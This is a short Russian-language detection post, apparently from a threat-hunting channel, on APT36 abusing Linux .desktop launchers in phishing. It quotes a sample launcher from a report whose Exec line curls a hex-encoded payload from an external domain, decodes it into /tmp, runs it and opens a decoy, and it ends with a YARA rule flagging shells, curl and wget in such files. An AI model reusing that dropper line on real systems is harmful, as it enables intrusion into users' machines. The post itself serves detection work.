Тема с ярлыками остаётся актуальной и для некоторых дистрибутивов Linux. Эту технику использует группировка APT36
.desktop — это launcher-файл, описанный в Desktop Entry Specification. Он используется desktop-environments для отображения приложений в меню и содержит параметр Exec, определяющий команду запуска.Пример файла из отчёта:
[Desktop Entry]
Name=Meeting_Ltr_ID15430ps.pdf
Exec=bash -c 'tmp_file="/tmp/Meeting_Ltr_ID15430ps.pdf-$(date +%s)"; curl -s "https://securestore.cv/ghg/Mt_dated_29.txt" | xxd -r -p > "$tmp_file" && chmod +x "$tmp_file" && "$tmp_file" & firefox --new-window "https://drive.google.com/file/d/123"'
Terminal=false
Type=Application
Icon=application-pdf
Categories=Utility;
X-GNOME-Autostart-enabled=true
X-AppImage-Integrate=false
Злоумышленники используют файлы
.desktop для получения доступа к хосту в фишинговых кампаниях. Далее цепочка действий несильно отличается от атак на Windows: загрузка вредоносного файла, его запуск и отображение пользователю decoy-файла🔭 Обнаружение:
🔤 отслеживаем создание или модификацию
.desktop файлов в пользовательских каталогах🔤 хантим использование бинарей из
gtfobins (bash, sh, python, curl, wget) в Exec
rule Linux_Desktop_Suspicious_GTFOBins
{
meta:
description = "Detect suspicious .desktop launcher executing shells or GTFOBins"
author = "@detectioneasy"
date = "2026-03-15"
reference = "https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/"
strings:
$desktop = "[Desktop Entry]" ascii nocase
$exec = "Exec=" ascii nocase
$sh = "sh -c" ascii nocase
$pipe_sh = "| sh" ascii nocase
$pipe_bash = "| bash" ascii nocase
$pipe_zsh = "| zsh" ascii nocase
$pipe_dash = "| dash" ascii nocase
$curl = "curl " ascii nocase
$wget = "wget " ascii nocase
$tmp = "/tmp/" ascii nocase
$cache = ".cache/" ascii nocase
condition:
$desktop and $exec and
2 of (
$sh,
$pipe_sh,$pipe_bash,$pipe_zsh,$pipe_dash,
$curl,$wget,$tmp,$cache
)
}
#detection@detectioneasy
#ttp@detectioneasy